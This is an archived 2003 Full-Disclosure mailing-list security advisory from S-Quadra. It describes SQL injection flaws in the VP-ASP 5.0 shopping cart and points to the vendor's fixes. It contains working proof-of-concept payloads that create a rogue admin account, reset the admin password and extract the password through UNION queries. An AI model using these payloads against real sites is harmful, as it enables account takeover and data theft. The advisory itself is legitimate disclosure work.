[Full-Disclosure] Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection Vulnerabilities

From: S-Quadra Security Research (research_at_s-quadra.com)
Date: 12/01/03

  • Next message: vordhosbn: "[Full-Disclosure] #hackphreak lecture series (2)"
    To: full-disclosure <full-disclosure@lists.netsys.com>, bugtraq <bugtraq@securityfocus.com>
    Date: Mon, 01 Dec 2003 16:15:53 +0300
    
    

            S-Quadra Advisory #2003-11-28

    Topic: Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL
    Injection Vulnerabilities
    Severity: Average
    Vendor URL: http://www.vpasp.com
    Advisory URL: http://www.s-quadra.com/advisories/Adv-20031128.txt
    Release date: 28 Nov 2003

     1. DESCRIPTION

    Virtual Programming VP-ASP is a shopping cart application for e-commerce
    enabled sites.
    It is written in ASP, supports the following databases: Access, MSSQL,
    MYSQL
    on Windows and MYSQL on Unix.

    VP-ASP suffers from SQL injection vulnerabilities, which may allow an
    attacker
    in some cases to gain administrative access to the installed VP-ASP
    Shopping Cart software
    or execute arbitrary commands on a target's system.

     2. DETAILS

     -- Vulnerability 1: SQL Injection vulnerability in 'shopsearch.asp' script

    An SQL Injection vulnerability has been found in the shopsearch.asp script.
    User supplied input is not filtered before being used in a SQL query.
    Consequently,
    query modification using malformed input is possible. Exploitation of
    the vulnerability
    allows a remote attacker to insert a new user with administrative
    privileges.
    A more sophisticated exploitation would allow a remote attacker to
    execute arbitrary commands
    on a target's system (via MSSQL xp_cmdshell() function for example).

     -- PoC code 1:

     Platform: Win32/MSSQL

    Posting this data to shopsearch.asp creates new administrative account

    Keyword=&category=5); insert into tbluser (fldusername) values
    ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
    Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
    fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
    Keyword=&category=3); update tbluser set fldaccess='1' where
    fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

    Posting this data to shopsearch.asp changes admin password

    Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
    fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

     -- Vulnerability 2: SQL Injection vulnerability in
    'shopdisplayproducts.asp' script

    An SQL Injection vulnerability has been found in the
    shopdisplayproducts.asp script.
    Exploitation of the vulnerability will allow remote attacker to read any
    information from a database.

     -- PoC code 2:

    Platform: Win32/MSSQL

    http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

    changing value at the end of request
            %20'a%25'--
            %20'b%25'--
            %20'c%25'--
            ...
    and looking through the HTTP response from VP-ASP web server attacker
    can find the admin password.

     3. FIX INFORMATION

    S-Quadra alerted VP-ASP development team to this issue on 28th November
    2003.
    Security fixes from VP-ASP development team available at
    http://www.vpasp.com/virtprog/info/faq_securityfixes.htm

     4. CREDITS

    Nick Gudov <cipher@s-quadra.com> is responsible for discovering
    this issue.

     5. ABOUT

    S-Quadra offers services in computer security, penetration testing and
    network assesment, web application security, source code review and
    third party product
    vulnerability assesment, forensic support and reverse engineering.

    Security is an art and our goal is to bring responsible and high quality
    security service to the IT market, customized to meet the unique needs
    of each
    individual client.

    S-Quadra, (pronounced es quadra), is not an acronym.
    It's unique, creative and innovative - just like the security services
    we bring to our clients.
     
            S-Quadra Advisory #2003-11-28

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: vordhosbn: "[Full-Disclosure] #hackphreak lecture series (2)"

    Relevant Pages